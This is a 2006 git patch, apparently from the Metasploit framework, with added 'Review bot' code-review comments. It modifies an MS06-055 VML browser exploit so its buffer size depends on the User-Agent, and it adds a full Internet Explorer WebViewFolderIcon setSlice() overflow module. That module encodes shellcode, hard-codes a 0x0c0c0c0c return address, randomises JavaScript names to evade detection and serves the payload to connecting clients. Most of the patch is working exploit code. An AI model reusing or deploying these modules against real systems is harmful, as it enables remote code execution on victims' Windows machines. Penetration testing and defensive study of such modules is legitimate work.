From f2ed69b99106db1be754929ebfd384875dc95482 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Wed, 27 Sep 2006 04:01:22 +0000
Subject: [PATCH] User-Agent detection for VML exploit. Randomization for the setSlice() exploit
git-svn-id: file:///home/svn/framework3/trunk@3978 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/browser/ms06_055_vml_method.rb | 7 +-
 .../windows/browser/webview_setslice.rb | 116 ++++++++++++++++++
 2 files changed, 119 insertions(+), 4 deletions(-)
 create mode 100644 modules/exploits/windows/browser/webview_setslice.rb
diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb
index 8c4c2319ff..50e7507464 100644
--- a/modules/exploits/windows/browser/ms06_055_vml_method.rb
+++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb
@@ -55,10 +55,9 @@ class Exploits::Windows::Browser::MS06_055_VML_Overflow < Msf::Exploit::Remote
 # Determine the buffer length to use
 buflen = 1024
- # if ()
- # buflen = 65535
- # end
- buflen = 65535
+ if (request.headers['User-Agent'] =~ /Windows 5\.[123]/)
+ buflen = 65535
+ end
 # Encode the shellcode
 shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
diff --git a/modules/exploits/windows/browser/webview_setslice.rb b/modules/exploits/windows/browser/webview_setslice.rb
new file mode 100644
index 0000000000..38045df66f
--- /dev/null
+++ b/modules/exploits/windows/browser/webview_setslice.rb
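Review bot: In ms06_055_vml_method.rb the new `if (request.headers['User-Agent'] =~ /Windows 5\.[123]/)` branch has no comment saying which User-Agent token the pattern is meant to match or why those clients get 65535 instead of 1024, so a reader cannot check the pattern against real header values. I would add a line above it such as `# User-Agent is client-supplied and may be absent; a missing or non-matching header keeps buflen at 1024` (presumably `headers[]` returns nil for an absent header — confirm), plus one naming the intended OS versions. Because the response body now varies with a request header, anyone replaying this module's traffic for signature or sandbox work will see different output depending on the User-Agent sent, which is worth stating in the module description. The enclosing method starts and ends outside the hunk.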
@@ -0,0 +1,116 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote
+
+ include Exploit::Remote::HttpServer::Html
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
+ 'Description' => %q{
+ This module exploits a flaw in the WebViewFolderIcon ActiveX control
+ included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
+ during the Month of Browser Bugs project (MoBB #18).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'hdm',
+ ],
+ 'Version' => '$Revision: 3783 $',
+ 'References' =>
+ [
+ [ 'OSVDB', '27110' ],
+ [ 'BID', '19030' ],
+ [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'BadChars' => "\x00",
+
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
+ ],
+ 'DefaultTarget' => 0))
+ end
+
+ def autofilter
+ false
+ end
+
+ def on_request_uri(cli, request)
+
+ # Re-generate the payload
+ return if ((p = regenerate_payload(cli)) == nil)
+
+ # Encode the shellcode
+ shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+
+ # Get a unicode friendly version of the return address
+ ret_addr = [target.ret].pack('H*')[0,4]
+
+ # Randomize the javascript variable names
+ var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
+ var_unescape = Rex::Text.rand_text_alpha(rand(30)+2)
+ var_x = Rex::Text.rand_text_alpha(rand(30)+2)
+ var_i = Rex::Text.rand_text_alpha(rand(30)+2)
+ var_tic = Rex::Text.rand_text_alpha(rand(30)+2)
+ var_toc = Rex::Text.rand_text_alpha(rand(30)+2)
+
+ # Randomize HTML data
+ html = Rex::Text.rand_text_alpha(rand(30)+2)
+
+ # Build out the message
+ content = %Q|
+
+
+
+
+
+#{html}
+
+
+ |
+
+ print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+ # Transmit the response to the client
+ send_response(cli, content)
+ end
+
+end
+
+end
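Review bot: In `on_request_uri` of webview_setslice.rb, `return if ((p = regenerate_payload(cli)) == nil)` binds a local `p` that no visible line reads (the next statement uses `payload.encoded`) and that shadows `Kernel#p`; `return if regenerate_payload(cli).nil?` says the same thing. `ret_addr` likewise has no visible use, though the body of the `%Q|…|` template is not shown on this page, so that may be an artifact of the listing. On the metadata side, 'References' carries only OSVDB, BID and a blog URL; adding a `[ 'CVE', '<CVE-ID>' ]` entry (placeholder, to be filled in from the advisory) would let defenders map the module to scanner and patch data. The Description names Windows 2000, XP and 2003 while 'Targets' lists a single XP / IE 6 entry, and a sentence reconciling the two would help.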